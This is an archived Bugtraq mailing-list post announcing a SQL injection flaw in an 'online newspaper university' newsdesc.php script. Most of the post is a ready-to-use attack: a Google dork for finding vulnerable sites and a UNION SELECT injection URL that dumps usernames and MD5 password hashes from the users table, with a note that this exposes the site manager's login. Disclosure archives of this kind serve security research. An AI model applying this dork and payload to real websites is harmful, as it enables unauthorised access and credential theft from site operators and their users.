| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-Id: <201204112129.q3BLTErw016295@sf01web3.securityfocus.com> Date: Wed, 11 Apr 2012 21:29:14 GMT From: CrAzY_CrAcKeR@...1-ss-2-lb.cnet.com To: bugtraq@...urityfocus.com Subject: online newspaper university"newsdesc.php" SQL Injection Vulnerabilities ################################################################## # Title : online newspaper university "newsdesc.php" SQL Injection Vulnerabilities # # Discovered By: CrAzY CrAcKeR # # Home : Null # # Email : CrAzY_CrAcKeR@...mail.com.com # # date : 12/4/2012 # # d0rk:- inurl:"inurl:news/newsdesc.php" # ################################################################## ################################################################## # # +-+-+-+-+-+-+-+-+-+-+ # --+CrAzY CrAcKeR+-- # +-+-+-+-+-+-+-+-+-+-+ # # ################################################################## ################################################################## # Example:- # # [-] http://www.???.com/news/newsdesc.php?id=(sql) # # [-] Injection code.... ( 0+union+select+1,concat(username,0x3a,password),3,4,5,6%20FROM%20users%20-- ) # # [-] http://www.???.com/news/newsdesc.php?id=2+and+1=0+union+select+1,concat(username,0x3a,password),3,4,5,6%20FROM%20users%20-- # # [-] you see now password (md5) and the name of the site manager #################################################################### # Greeting to my friend "A7eb Alwrd" ####################################################################
Powered by blists - more mailing lists